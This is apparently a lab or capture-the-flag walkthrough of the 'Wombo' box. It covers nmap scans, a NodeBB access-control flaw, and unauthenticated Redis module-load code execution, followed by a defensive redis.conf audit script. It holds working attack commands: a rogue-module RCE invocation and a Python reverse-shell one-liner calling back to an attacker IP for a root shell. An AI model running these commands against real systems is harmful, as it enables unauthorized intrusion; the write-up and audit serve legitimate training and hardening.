Wombo

Enum

sudo nmap -T4 -A -v -oN nmap --min-rate 1000 192.168.193.210
sudo nmap -T4 -A -v -oN tcpall -p- --min-rate 1000 192.168.193.210
sudo nmap -T4 --script=vuln -v -oN vuln -p- --min-rate 1000 192.168.193.210

Found port 8080

NodeBB

Googled for exploits

Found a broken access control issue

Loaded the request in Burp

image

to 1

image

Now can we login as admin?

The login page is broken, but robots.txt leaks the admin login

image
image
image

Local login system? Does that mean it's a local account? - Unable to SSH

hmmmmmm

Back to nmap, we see port

6379/tcp  open   redis      Redis key-value store 5.0.9

open as well.

searchsploit redis 5
---------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                            |  Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation                                      | windows/local/46155.c
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation                                      | windows/local/46155.c
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation                    | windows/local/45244.txt
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)                                             | linux/remote/47195.rb
Redis 5.0 - Denial of Service                                                                             | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                   | linux/local/44904.py
---------------------------------------------------------------------------------------------------------- ---------------------------------

We have Metasploit modules, but let's google for non-msf PoCs

Try this one

We gotta make a rogue module

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
cd RedisModules-ExecuteCommand

Compile the module

make
mv module.so ../
python3 redis-rce.py -r 192.168.220.69 -p 6379 -L 192.168.45.207 -P 8080 -f module.so

That's a shell

image

That's root?

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ whoami
eroot
$ 

We can't cd into dirs, so let's get a real shell.

export RHOST="192.168.45.207";export RPORT=22;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
image

That's root.
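The whole chain hinged on Redis 5.0.9 being reachable from the network with no password and the MODULE command available. As an added example (not part of the original writeup or of the tools it uses), here is a small redis.conf audit that flags exactly those conditions; the two embedded config fragments are constructed, not the box's real files, and the password value is a placeholder.

```python
import sys

# Constructed redis.conf fragments (not from the box): WEAK_CONF mirrors the
# exposure seen here (reachable from the network, no auth, MODULE usable);
# HARDENED_CONF is the corrected form. Running redis as a dedicated
# unprivileged user instead of root is a service-unit matter, not redis.conf.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE-ME-placeholder
rename-command MODULE ""
rename-command CONFIG ""
"""

def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of argument lists seen
    for it, in file order; comments and blank lines are skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        conf.setdefault(name.lower(), []).append(args)
    return conf

def audit_redis_conf(text):
    """Return the weaknesses that let an unauthenticated client reach
    MODULE LOAD; an empty list means none of them were found."""
    conf = parse_redis_conf(text)
    findings = []
    binds = conf.get("bind", [[]])[-1]          # no bind line = all interfaces
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind: listening on all interfaces")
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if not pm or pm[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    rp = conf.get("requirepass", [[]])[-1]
    if not rp or rp[0] in ('""', "''"):
        findings.append("requirepass: no password set")
    disabled = {a[0].upper() for a in conf.get("rename-command", [])
                if len(a) == 2 and a[1] in ('""', "''")}
    for cmd in ("MODULE", "CONFIG"):            # both let a client reconfigure the server
        if cmd not in disabled:
            findings.append(f"{cmd}: not disabled via rename-command")
    return findings

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONF
    for finding in audit_redis_conf(text) or ["no findings"]:
        print(finding)
```

Pass a real redis.conf path as the first argument to audit a live config instead of the constructed sample.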